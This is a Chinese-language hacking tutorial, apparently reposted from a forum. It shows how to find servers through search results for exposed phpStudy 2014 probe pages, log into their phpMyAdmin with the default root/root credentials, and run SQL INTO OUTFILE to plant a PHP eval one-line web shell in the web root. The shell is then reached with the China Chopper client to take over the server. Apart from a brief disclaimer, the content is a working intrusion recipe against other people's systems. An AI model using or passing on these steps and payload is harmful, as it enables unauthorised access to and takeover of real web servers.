聲明:

本教程僅僅是演示管理員安全意識不強,存在弱口令情況.網站被非法入侵的演示,請勿用於惡意用途!

• 今天看到論壇有人發布了一個通過這phpStudy 探針 關鍵字搜索檢索提權網址服務器，這個挺簡單的.記錄一下吧。

• 搜索引擎KeyWord：

phpStudy 探針 2014

• 多往後翻翻。翻個幾十頁最好。

• 點開搜索到的內容。

點開搜索到的內容。

翻到最下面，嘗試連接mysql數據庫是否正常(賬號密碼默認為：root)：

1、 如果提示正常。請在網頁後面加上 ‘phpmyadmin’，如 http://www.baidu.com/phpmyadmin

2、 然後回車即可。

3、 出現以下界面；默認賬號密碼嘗試登陸;

4、 登陸成功後，第一步找到左邊導航欄的MYSQL，然後點擊上面的SQL，如圖

5、 (點擊mysql後，右側表單會增加很多內容，不要理會他，直接點表單上方的SQL按鈕即可。)

6、 下面往SQL寫入一句話木馬，然後用菜刀連接即可！

1、 圖片效果不好,貼出代碼,自行對比一下子- -
2、 Code:

mysq1
sql 語句
Drop TABLE IF EXISTS 菜刀連接密碼;
Create TABLE 自定義一個表名(cmd text NOT NULL);
Insert INTO 自定義一個表名 (cmd) VALUES(‘<?php @eval($_POST[菜刀連接密碼])?>‘);
Select cmd from 自己編寫 into outfile ‘D:/WWW/菜刀連接地址.php‘;[‘左邊絕對地址需要根據網頁自行更改‘]
Drop TABLE IF EXISTS 用戶和密碼;
 

• 1
• 2
• 3
• 4
• 5
• 6
• 7

7、 添加完成後，使用菜刀連接；

後面tmp.php是在寫入SQL一句話木馬那自定義設置的。

成功連上！可自行提權服務器等操作!

利用phpStudy 探針 提權網站服務器